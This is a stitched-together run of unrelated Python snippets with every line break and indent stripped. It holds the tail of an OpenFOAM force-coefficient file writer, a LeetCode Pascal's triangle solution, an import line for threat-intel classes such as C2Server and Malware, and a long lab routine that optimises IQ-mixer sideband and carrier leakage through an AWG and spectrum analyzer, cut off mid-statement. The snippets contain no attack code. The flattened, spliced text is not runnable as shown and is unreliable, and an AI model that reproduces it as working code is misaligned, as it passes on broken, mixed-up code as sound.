" + str(self.pitchAxis[1]) + " " + str(self.pitchAxis[2]) + ");") forceCoeffsFile.write("\n magUInf "+ str(self.U) + ";") forceCoeffsFile.write("\n lRef " + str(self.Diam) + ";") forceCoeffsFile.write("\n Aref " + str(self.Aref) + ";") forceCoeffsFile.write("\n /*binData") forceCoeffsFile.write("\n {") forceCoeffsFile.write("\n nBin 20;") forceCoeffsFile.write("\n direction (1 0 0);") forceCoeffsFile.write("\n cumulative yes;") forceCoeffsFile.write("\n }*/") forceCoeffsFile.write("\n}") forceCoeffsFile.write("\n\npressureCoeff1") forceCoeffsFile.write("\n{") forceCoeffsFile.write("\n type pressure;") forceCoeffsFile.write('\n libs ("libfieldFunctionObjects.so");') forceCoeffsFile.write("\n writeControl writeTime;") forceCoeffsFile.write("\n timeInterval " + str(self.parameters['writeInterval'] )+ ";") forceCoeffsFile.write("\n log yes;") forceCoeffsFile.write("\n patch (" + str(self.geometry) + ");") forceCoeffsFile.write("\n rhoInf " + str(self.parameters['rho']) +";") forceCoeffsFile.write("\n mode totalCoeff;") forceCoeffsFile.write("\n pRef 0;") forceCoeffsFile.write("\n pInf 0;") forceCoeffsFile.write("\n UInf ("+ str(self.U) + " 0 0);") forceCoeffsFile.write("\n}") forceCoeffsFile.write("\n\n// ******************************************************************* //")
python
# https://leetcode.com/problems/pascals-triangle/ class Solution(object): def generate(self, numRows): """ :type numRows: int :rtype: List[List[int]] """ if numRows == 0: return [] if numRows == 1: return [[1]] if numRows == 2: return [[1], [1, 1]] res = [[1], [1, 1]] for i in range(2, numRows): temp = [1] for j in range(1, i): temp.append(res[i-1][j-1] + res[i-1][j]) temp.append(1) res.append(temp) return res
python
from .c2_server import C2Server from .malware import Malware from .actor import Actor from .family import Family
python
import numpy as np from IPython.display import clear_output import itertools as it import pylabnet.hardware.spectrum_analyzer.agilent_e4405B as sa_hardware import time import pandas as pd import seaborn as sns import matplotlib import matplotlib.pyplot as plt from IPython.display import clear_output, display class Optimizer: def __init__(self): pass class IQOptimizer(Optimizer): def __init__( self, mw_source, hd, sa, carrier, signal_freq, max_iterations=5, max_lower_sideband_pow=-58, max_carrier_pow=-58, num_points=25, cushion_param=5, param_guess=([60, 0.6, 0.65, -0.002, 0.006]), phase_window=44, q_window=0.34, dc_i_window=0.0135, dc_q_window=0.0115, plot_traces=True, awg_delay_time=0.0, averages=1, min_rounds=1, HDAWG_ports=[3, 4], oscillator=2): """ Instantiate IQ optimizer :param mw_source: instance of HMC_T2220 client :param hd: instance of AWG client :param sa: instance of spectrum analyzer client :param carrier: desired carrier frequency (in Hz) :param signal_freq: desired signal frequency (in Hz) :kwarg num_points: number of points for scan window :kwarg plot_traces: user decides if displaying power vs. frequency plots is desired :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband :kwarg max_lower_sideband_pow: desired upper bound for lower sideband power (in dBm) :kwarg max_carrier_pow: desired upper bound for carrier power (in dBm) :kwarg cushion_param: positive real number positively correlated with speed of zooming in on minimum :kwarg param_guess: starting parameters for optimization: ([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q]) :kwarg phase_window: size of initial phase scan (in degrees) :q_window: size of initial amplitude imbalance scan window (unitless) :dc_i_window: size of initial dc i offset scan window (in V) :dc_q_window: size of initial dc q offset scan window (in V) """ # Configure hd settings # Assign oscillator 1 to sine output 2 #hd.seti('sines/1/oscselect', 1) # Set carrier frequency hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq) # Set I and Q amplitude, calculate from q and a0 in the param_guess array hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1]))) hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1]))) # Set phase offset between I and Q hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0]) # Enable sine waves hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1) hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1) self.mw_source = mw_source self.hd = hd self.sa = sa self.carrier = carrier self.signal_freq = signal_freq self.num_points = num_points self.max_iterations = max_iterations self.plot_traces = plot_traces self.cushion_param = cushion_param self.HDAWG_ports = HDAWG_ports #Set mw freq self.mw_source.output_on() self.mw_source.set_freq(self.carrier) #Instantiate IQ Optimizer sweep window self.phase_min = param_guess[0] - phase_window / 2 self.phase_max = param_guess[0] + phase_window / 2 self.q_min = param_guess[1] - q_window / 2 self.q_max = param_guess[1] + q_window / 2 self.a0 = param_guess[2] self.dc_min_i = param_guess[3] - dc_i_window / 2 self.dc_max_i = param_guess[3] + dc_i_window / 2 self.dc_min_q = param_guess[4] - dc_q_window / 2 self.dc_max_q = param_guess[4] + dc_q_window / 2 # Instantiate params we will optimize self.opt_phase = None self.opt_q = None self.amp_q_opt = None self.amp_i_opt = None self.dc_offset_i_opt = None self.dc_offset_q_opt = None # Instantiate arrays and bounds self.phases = np.linspace(self.phase_min, self.phase_max, self.num_points) self.qs = np.linspace(self.q_min, self.q_max, self.num_points) self.lower_sideband_power = np.zeros((self.num_points, self.num_points)) self.opt_lower_sideband_pow = float("inf") self.opt_carrier_pow = float("inf") self.max_lower_sideband_pow = max_lower_sideband_pow self.max_carrier_pow = max_carrier_pow # Instantiate and set markers self.upp_sb_marker = None self.lower_sb_marker = None self.carrier_marker = None self.set_markers() self._AWG_DELAY_TIME = awg_delay_time self._averages = averages self._min_rounds = min_rounds def set_markers(self): # Configure hd to enable outputs # self.hd.enable_output(0) # self.hd.enable_output(1) # Center frequency at carrier frequency self.sa.set_center_frequency(self.carrier + self.signal_freq) self.sa.set_frequency_span(6 * self.signal_freq) # Marker for upper sideband. self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1) self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2) self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3) # define target frequencies markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker] target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier]) max_deviation = 1e6 for marker, target_freq in zip(markers, target_freqs): time.sleep(1) marker.set_freq(target_freq) #assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz" self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.") #Set reference level to just above the height of our signal to minimize our noise floor self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2) if self.plot_traces == True: self.sa.plot_trace() def opt_lower_sideband(self): # Rough sweep self._sweep_phase_amp_imbalance() self._set_optimal_vals() # Instantiate local variables for the loop q_max2 = self.q_max q_min2 = self.q_min phase_max2 = self.phase_max phase_min2 = self.phase_min num_iterations = 0 while (self.opt_lower_sideband_pow > self.max_lower_sideband_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations - 1: q_cushion = np.abs(q_max2 - q_min2) / self.cushion_param phase_cushion = np.abs(phase_max2 - phase_min2) / self.cushion_param # Reset sweep window to zoom in on minimum q_max2 = self.opt_q + q_cushion q_min2 = self.opt_q - q_cushion phase_max2 = self.opt_phase + phase_cushion phase_min2 = self.opt_phase - phase_cushion # Instantiate variables self.phases = np.linspace(phase_min2, phase_max2, self.num_points) self.qs = np.linspace(q_min2, q_max2, self.num_points) self.lower_sideband_power = np.zeros((self.num_points, self.num_points)) self._sweep_phase_amp_imbalance() self._set_optimal_vals() num_iterations = num_iterations + 1 if num_iterations < self.max_iterations: self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations') else: self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations') time.sleep(1) self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') if self.plot_traces == True: # Heatmap plot lower_sideband_data = pd.DataFrame(self.lower_sideband_power, index=np.round(self.phases, 1), columns=np.round(self.qs, 2)) fig1, ax1 = plt.subplots(figsize=(8, 5)) ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'}) ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance') # Frequency plot self.sa.plot_trace() def opt_carrier(self): num_iterations = 0 # If carrier power already below threshold, no need to optimize carrier skipped = True if self.carrier_marker.get_power() > (self.max_carrier_pow - 10): skipped = False # Sweep 2D parameter space of DC offsets and record carrier power voltages_i = np.linspace(self.dc_min_i, self.dc_max_i, self.num_points) voltages_q = np.linspace(self.dc_min_q, self.dc_max_q, self.num_points) carrier_power = np.zeros((self.num_points, self.num_points)) self.opt_carrier_pow = self.carrier_marker.get_power() dc_max_i2 = self.dc_max_i dc_min_i2 = self.dc_min_i dc_max_q2 = self.dc_max_q dc_min_q2 = self.dc_min_q while (self.opt_carrier_pow > self.max_carrier_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations: carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power) # Retrieve optimal DC offsets self.dc_offset_i_opt = voltages_i[np.where(carrier_power == np.amin(carrier_power))[0][0]] self.dc_offset_q_opt = voltages_q[np.where(carrier_power == np.amin(carrier_power))[1][0]] self.opt_carrier_pow = np.amin(carrier_power) i_cushion = np.abs(dc_max_i2 - dc_min_i2) / self.cushion_param q_cushion = np.abs(dc_max_q2 - dc_min_q2) / self.cushion_param # Reset sweep window to zoom in on minimum dc_max_i2 = self.dc_offset_i_opt + i_cushion dc_min_i2 = self.dc_offset_i_opt - i_cushion dc_max_q2 = self.dc_offset_q_opt + q_cushion dc_min_q2 = self.dc_offset_q_opt - q_cushion # Reinstantiate variables voltages_i = np.linspace(dc_min_i2, dc_max_i2, self.num_points) voltages_q = np.linspace(dc_min_q2, dc_max_q2, self.num_points) num_iterations = num_iterations + 1 # Set optimal offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), self.dc_offset_i_opt) self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), self.dc_offset_q_opt) time.sleep(1) else: print('Skipped Carrier') self.dc_offset_i_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1)) self.dc_offset_q_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1)) if num_iterations < self.max_iterations: self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations') else: self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations') time.sleep(1) self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power())) if self.plot_traces == True and not skipped: # Heatmap plot dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1)) fig, ax = plt.subplots(figsize=(8, 5)) ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'}) ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]') # Frequency plot self.sa.plot_trace() def opt(self): self.opt_lower_sideband() self.opt_carrier() time.sleep(1) self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(.5 * (self.amp_q_opt + self.amp_i_opt)) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])') self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm') def _sweep_phase_amp_imbalance(self): for i, j in it.product(range(self.num_points), repeat=2): phase = self.phases[i] q = self.qs[j] # Calculate i and q amplitudes from q and a0 amp_i = 2 * q / (1 + q) * self.a0 amp_q = 2 * self.a0 / (1 + q) # Set i and q amplitudes self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i) self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q) # Set phaseshift self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase) #See sweep dc for explanation, basically allowing the point to update if (i == 0 and j == 0): time.sleep(1) if (j == 0): time.sleep(0.1) else: time.sleep(self._AWG_DELAY_TIME) # Read lower sideband power self.lower_sideband_power[i, j] = self._average_marker_power(self.lower_sb_marker) def _average_marker_power(self, marker): total_sum = 0 for i in range(self._averages): total_sum = total_sum + marker.get_power() return total_sum / self._averages def _set_optimal_vals(self): self.opt_phase = self.phases[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[0][0]] self.opt_q = self.qs[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[1][0]] self.opt_lower_sideband_pow = np.amin(self.lower_sideband_power) self.amp_i_opt = 2 * self.opt_q / (1 + self.opt_q) * self.a0 self.amp_q_opt = 2 * self.a0 / (1 + self.opt_q) # Set optimal I and Q amplitudes self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), self.amp_i_opt) self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), self.amp_q_opt) # Set optimal phaseshift self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), self.opt_phase) def _sweep_dc_offsets(self, voltages_i, voltages_q, carrier_power): for i, j in it.product(range(self.num_points), repeat=2): # Set I DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), voltages_i[i]) # Set Q DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), voltages_q[j]) # Found a bug where the first few points in the matrix seem to be from the point before, i.e. # the script is running faster then the spectrum analyzer can update #So we are first going to set the offsets to the initial voltage and wait a bit for teh #spectrum analyzer to update if (i == 0 and j == 0): time.sleep(1) #Otherwise just a generic small delay which we empirically have found to work if (j == 0): time.sleep(0.1) else: time.sleep(self._AWG_DELAY_TIME) # Read carrier power carrier_power[i, j] = self._average_marker_power(self.carrier_marker) return carrier_power, voltages_i, voltages_q def plot_dc_offsets_sweep(self, dc_min_i, dc_max_i, dc_min_q, dc_max_q, num_points): voltages_i = np.linspace(dc_min_i, dc_max_i, num_points) voltages_q = np.linspace(dc_min_q, dc_max_q, num_points) carrier_power = np.zeros((num_points, num_points)) dc_max_i2 = self.dc_max_i dc_min_i2 = self.dc_min_i dc_max_q2 = self.dc_max_q dc_min_q2 = self.dc_min_q carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power) dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1)) fig, ax = plt.subplots(figsize=(8, 5)) ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'}) ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]') def plot_phase_amp_sweep(self, phase_min, phase_max, q_min, q_max, num_points): self.phases = np.linspace(phase_min, phase_max, num_points) self.qs = np.linspace(q_min, q_max, num_points) self.lower_sideband_power = np.zeros((num_points, num_points)) self._sweep_phase_amp_imbalance() lower_sideband_data = pd.DataFrame(self.lower_sideband_power, index=np.round(self.phases, 1), columns=np.round(self.qs, 2)) fig1, ax1 = plt.subplots(figsize=(8, 5)) ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'}) ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance') class IQOptimizer_GD(Optimizer): def __init__( self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65, param_guess=([70, 0.975, 0.65, 0.05, -0.02]), phase_step=5, q_step=0.05, vi_step=0.005, vq_step=0.005, plot_traces=True, awg_delay_time=0.1, averages=10, HDAWG_ports=[3, 4], oscillator=2): """ Instantiate IQ optimizer :param mw_source: instance of microwave source client :param hd: instance of AWG client :param sa: instance of spectrum analyzer client :param carrier: desired carrier frequency (in Hz) :param signal_freq: desired signal frequency (in Hz) :kwarg plot_traces: user decides if displaying power vs. iteration plots is desired :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband :kwarg min_pow: noise floor :kwarg param_guess: starting parameters for optimization: ([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q]) :kwarg phase_step: step size for phase parameter in gradient descent :kwarg q_step: step size for amplitude imbalance parameter in gradient descent :kwarg vi_step: step size for dc I offset parameter in gradient descent :kwarg vq_step: step size for dc Q parameter in gradient descent :kwarg awg_delay_time: time to wait after setting awg parameters :kwarg averages: number of measurement for single point power measurement :kwarg HDAWG_ports: which wave ports to use on the HDAWG :kwarg oscillator: which oscillator to use on the HDAWG """ # Configure hd settings # Assign oscillator 1 to sine output 2 #hd.seti('sines/1/oscselect', 1) # Set carrier frequency hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq) # Set I and Q amplitude, calculate from q and a0 in the param_guess array hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1]))) hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1]))) # Set phase offset between I and Q hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0]) # Enable sine waves hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1) hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1) # set DC offsets hd.setd('sigouts/{}/offset'.format(HDAWG_ports[0] - 1), param_guess[3]) hd.setd('sigouts/{}/offset'.format(HDAWG_ports[1] - 1), param_guess[4]) self.mw_source = mw_source self.hd = hd self.sa = sa self.carrier = carrier self.signal_freq = signal_freq self.max_iterations = max_iterations self.plot_traces = plot_traces self.min_power = min_power self.HDAWG_ports = HDAWG_ports #Set mw freq self.mw_source.output_on() self.mw_source.set_freq(self.carrier) #Instantiate step sizes self.phase_step = phase_step self.q_step = q_step self.vi_step = vi_step self.vq_step = vq_step #Instantiate initial guesses self.phase_guess = param_guess[0] self.q_guess = param_guess[1] self.a0 = param_guess[2] self.dc_i_guess = param_guess[3] self.dc_q_guess = param_guess[4] # Instantiate params we will optimize self.opt_phase = None self.opt_q = None self.amp_q_opt = None self.amp_i_opt = None self.dc_offset_i_opt = None self.dc_offset_q_opt = None # Instantiate arrays and bounds self.opt_lower_sideband_pow = float("inf") self.opt_carrier_pow = float("inf") # Instantiate and set markers self.upp_sb_marker = None self.lower_sb_marker = None self.carrier_marker = None self.set_markers() self._AWG_DELAY_TIME = awg_delay_time self._averages = averages def set_markers(self): # Configure hd to enable outputs # self.hd.enable_output(0) # self.hd.enable_output(1) # Center frequency at carrier frequency self.sa.set_center_frequency(self.carrier + self.signal_freq) self.sa.set_frequency_span(6 * self.signal_freq) # Marker for upper sideband. self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1) self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2) self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3) # define target frequencies markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker] target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier]) max_deviation = 1e6 for marker, target_freq in zip(markers, target_freqs): time.sleep(1) marker.set_freq(target_freq) #assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz" self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.") #Set reference level to just above the height of our signal to minimize our noise floor self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2) if self.plot_traces == True: self.sa.plot_trace() def opt_lower_sideband(self): #gradient descent starting point phase = self.phase_guess q = self.q_guess self.set_phase_and_amp(phase, q) curr_power = self._average_marker_power(self.lower_sb_marker) #store power values for every iteration power_vec = [curr_power] #initialize step sizes and iteration number phase_step = self.phase_step q_step = self.q_step num_iterations = 0 while num_iterations < self.max_iterations and curr_power > self.min_power: grad = self.calc_slope_phase_and_amp(phase, q, phase_step, q_step) phase_new = phase - grad[0] * phase_step q_new = q - grad[1] * q_step self.set_phase_and_amp(phase_new, q_new) new_power = self._average_marker_power(self.lower_sb_marker) if new_power < curr_power: curr_power = new_power phase = phase_new q = q_new else: phase_step = phase_step / 2 q_step = q_step / 2 power_vec.append(curr_power) num_iterations = num_iterations + 1 if num_iterations < self.max_iterations: self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations') else: self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations') time.sleep(1) self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.opt_phase = phase self.opt_q = q self.set_phase_and_amp(self.opt_phase, self.opt_q) self.lower_sideband_power = self.lower_sb_marker.get_power() if self.plot_traces == True: plt.plot(power_vec, label='lower band') def opt_carrier(self): #gradient descent starting point vi = self.dc_i_guess vq = self.dc_q_guess self.set_dc_offsets(vi, vq) curr_power = self._average_marker_power(self.carrier_marker) #store power values for every iteration power_vec = [curr_power] # initialize step sizes and iteration number vi_step = self.vi_step vq_step = self.vq_step num_iterations = 0 while num_iterations < self.max_iterations and curr_power > self.min_power: grad = self.calc_slope_dc_offsets(vi, vq, vi_step, vq_step) vi_new = vi - grad[0] * vi_step vq_new = vq - grad[1] * vq_step self.set_dc_offsets(vi_new, vq_new) new_power = self._average_marker_power(self.carrier_marker) if new_power < curr_power: curr_power = new_power vi = vi_new vq = vq_new else: vi_step = vi_step / 1.2 vq_step = vq_step / 1.2 power_vec.append(curr_power) num_iterations = num_iterations + 1 if num_iterations < self.max_iterations: self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations') else: self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations') time.sleep(1) self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + 'dBm') self.dc_offset_i_opt = vi self.dc_offset_q_opt = vq self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt) self.carrier_power = self.carrier_marker.get_power() if self.plot_traces == True: plt.plot(power_vec, label='carrier band') plt.xlabel('iteration #') plt.ylabel('power [dBm]') plt.legend() def opt(self): self.opt_lower_sideband() while self.lower_sideband_power > self.min_power + 7.5: self.opt_lower_sideband() self.opt_carrier() while self.carrier_power > self.min_power + 7.5: self.dc_i_guess = self.dc_offset_i_opt self.dc_q_guess = self.dc_offset_q_opt self.opt_carrier() #for i in range(10): # if self.carrier_power - 3.5 > self.lower_sideband_power: # self.dc_i_guess = self.dc_offset_i_opt # self.dc_q_guess = self.dc_offset_q_opt # self.opt_carrier() time.sleep(1) self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])') self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm') def set_phase_and_amp(self, phase, q): amp_i = 2 * q / (1 + q) * self.a0 amp_q = 2 * self.a0 / (1 + q) # Set i and q amplitudes self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i) self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q) # Set phaseshift self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase) def set_dc_offsets(self, v1, v2): # Set I DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1) # Set Q DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2) def _average_marker_power(self, marker): total_sum = 0 for i in range(self._averages): total_sum = total_sum + marker.get_power() return total_sum / self._averages def calc_slope_phase_and_amp(self, phase, q, phase_step, q_step): self.set_phase_and_amp(phase + phase_step, q) time.sleep(self._AWG_DELAY_TIME) phase_p = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase - phase_step, q) time.sleep(self._AWG_DELAY_TIME) phase_m = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase, q + q_step) time.sleep(self._AWG_DELAY_TIME) q_p = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase, q - q_step) time.sleep(self._AWG_DELAY_TIME) q_m = self._average_marker_power(self.lower_sb_marker) return([(phase_p - phase_m) / 2, (q_p - q_m) / 2]) def calc_slope_dc_offsets(self, vi, vq, vi_step, vq_step): self.set_dc_offsets(vi + vi_step, vq) time.sleep(self._AWG_DELAY_TIME) vi_p = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi - vi_step, vq) time.sleep(self._AWG_DELAY_TIME) vi_m = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi, vq + vq_step) time.sleep(self._AWG_DELAY_TIME) vq_p = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi, vq - vq_step) time.sleep(self._AWG_DELAY_TIME) vq_m = self._average_marker_power(self.carrier_marker) return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2]) class IQOptimizer_GD_multifreq(Optimizer): def __init__( self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65, param_guess=([85, 85, 0.9, 0.9, 0.05, -0.02]), phase_step=5, q_step=0.1, vi_step=0.005, vq_step=0.005, plot_traces=True, awg_delay_time=0.1, averages=5, HDAWG_ports=[3, 4], oscillator=[1, 2]): """ Instantiate IQ optimizer :param mw_source: instance of microwave source client :param hd: instance of AWG client :param sa: instance of spectrum analyzer client :param carrier: desired carrier frequency (in Hz) :param signal_freq: desired signal frequencies :kwarg plot_traces: user decides if displaying power vs. iteration plots is desired :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband :kwarg min_pow: noise floor :kwarg param_guess: starting parameters for optimization: ([phase shift 1, phase shift 2, q := (amp_i/amp_q) amplitude imbalance 1, amplitude imbalance 2 dc_offset_i, dc_offset_q]) :kwarg phase_step: step size for phase parameter in gradient descent :kwarg q_step: step size for amplitude imbalance parameter in gradient descent :kwarg vi_step: step size for dc I offset parameter in gradient descent :kwarg vq_step: step size for dc Q parameter in gradient descent :kwarg awg_delay_time: time to wait after setting awg parameters :kwarg averages: number of measurement for single point power measurement :kwarg HDAWG_ports: which wave ports to use on the HDAWG :kwarg oscillator: which oscillator to use on the HDAWG """ # Set carrier frequency hd.setd('oscs/{}/freq'.format(oscillator[0] - 1), signal_freq[0]) hd.setd('oscs/{}/freq'.format(oscillator[1] - 1), signal_freq[1]) # assign oscillators to correct outputs # for first output hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format( int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[0] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format( int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[0] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format( int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[1] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format( int(np.floor((HDAWG_ports[0] - 1) / 2)), np.mod(HDAWG_ports[0] - 1, 2)), oscillator[1] - 1) # for second output hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format( int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[0] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format( int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[0] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format( int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[1] - 1) hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format( int(np.floor((HDAWG_ports[1] - 1) / 2)), np.mod(HDAWG_ports[1] - 1, 2)), oscillator[1] - 1) self.mw_source = mw_source self.hd = hd self.sa = sa self.carrier = carrier self.signal_freq = signal_freq self.max_iterations = max_iterations self.plot_traces = plot_traces self.min_power = min_power self.HDAWG_ports = HDAWG_ports #Set mw freq self.mw_source.output_on() self.mw_source.set_freq(self.carrier) #Instantiate step sizes self.phase_step = phase_step self.q_step = q_step self.vi_step = 